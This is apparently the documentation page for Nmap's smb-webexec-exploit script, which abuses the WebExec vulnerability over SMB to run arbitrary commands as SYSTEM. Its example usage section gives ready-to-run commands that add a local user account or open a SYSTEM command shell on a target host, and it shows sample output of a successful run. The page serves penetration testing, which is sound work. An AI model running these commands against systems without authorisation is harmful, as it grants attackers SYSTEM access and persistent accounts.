Script smb-webexec-exploit
Script types:
intrusive, exploit
Script Summary
Attempts to run a command via WebExService, using the WebExec vulnerability. Given a Windows account (local or domain), this will start an arbitrary executable with SYSTEM privileges over the SMB protocol.
The argument webexec_command will run the command directly. It may or may not start with a GUI. webexec_gui_command will always start with a GUI, and is useful for running commands such as "cmd.exe" as SYSTEM if you have access.
See also:
Script Arguments
- webexec_gui_command
The command to run on the target with a GUI
- webexec_command
The command to run on the target
- randomseed, smbbasic, smbport, smbsign
See the documentation for the smb library.
- smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername
See the documentation for the smbauth library.
Example Usage
nmap --script smb-vuln-webexec --script-args 'smbusername=<username>,smbpass=<password>,webexec_command=net user test test /add' -p139,445 <host> nmap --script smb-vuln-webexec --script-args 'smbusername=<username>,smbpass=<password>,webexec_gui_command=cmd' -p139,445 <host>
Script Output
| smb-vuln-webexec: |_ Vulnerable: WebExService could be accessed remotely as the given user! | smb-vuln-webexec: | Vulnerable: WebExService could be accessed remotely as the given user! |_ ...and successfully started console command: net user test test /add
License: Same as Nmap--See